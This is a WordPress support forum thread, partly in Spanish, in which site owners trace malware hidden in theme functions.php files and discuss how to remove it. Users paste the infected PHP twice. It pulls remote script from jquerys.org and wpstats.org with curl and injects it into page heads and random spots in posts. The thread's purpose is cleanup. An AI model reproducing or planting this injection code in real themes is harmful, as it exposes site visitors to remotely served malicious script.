name
(@felipemaciel)
ponga acá en code lo contenido en fichero “functions.php” de tu tema
put here the content from your “functions.php”
este es el código de functions.php
Please read this http://codex.wordpress.org/Forum_Welcome#Posting_Code before posting any more code or asking someone to post code.
name
(@felipemaciel)
@ watesam, the script is called from another php
If you want, send me your theme in ZIP format for me to analyze.
[ email redacted ]
@felipe
Yes, I found one jquery insertion and can’t find the other. I am trying to find the infected .php file. Where should I look?
Just search your files
for string which says
insert_jquery_function
on nix you can use, sudo grep “insert_jquery_function” /directory of wordpress files/
for windows, dont have a clue!
I had the same problem…thank you for your help!!!
I have two site with the same problem. Taking that code out of the functions.php file worked on one of the sites, but not on the other … any ideas ?
Please help me. My functions.php this code is. What i delete?
/* add theme jquery functions */
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');
define('PUNCH_FUNCTIONS', TEMPLATEPATH . '/functions/template');
define('PUNCH_JAVASCRIPT', get_template_directory_uri() . '/js');
define('PUNCH_CSS', get_template_directory_uri() . '/css');
try removing
/* dont have a clue what the first on is though, but doesnt really look like you should have it */
/* 1st piece doesnt look ok */
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();
/* second piece cuases redirct */
if(function_exists('curl_init')) {
$url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data";
I tried, but it is removed, the site will not work. I checked the original file, and looked the same, so this is a template script. However kaspersky continuous indicates this: http://www.jquerys.org/jquery-1.6.3.min.js
Hi guys!
Well, it seems we all have the same problem.
My website has the same problem.
http://www.vidabohemia.com
Avast goes crazy everytime I go in saying that the website is infected with malware. At the end it is this jquerys.org it is infected with.
My theme is MADE.
I dont have a clue on where to find this .php file or if its different as it is a different theme.
Any clue to this will be greatly appreciated.
Thanks.
Walter
walteravila@ Puedes hacer lo que yo hice, primero limpia tu pc http://download.eset.com/special/eos/esetsmartinstaller_enu.exe, segundo des-instala los plugins que instalaste últimamente y luego busca en http://urlquery.net/ agregando el link de tu pagina que no tengas el malware jquerys, la otra es buscar el codigo en la plantilla, pero puede ser difícil encontrarlo por que puede estar en cualquier php
espero te sirva a mi me funciono.
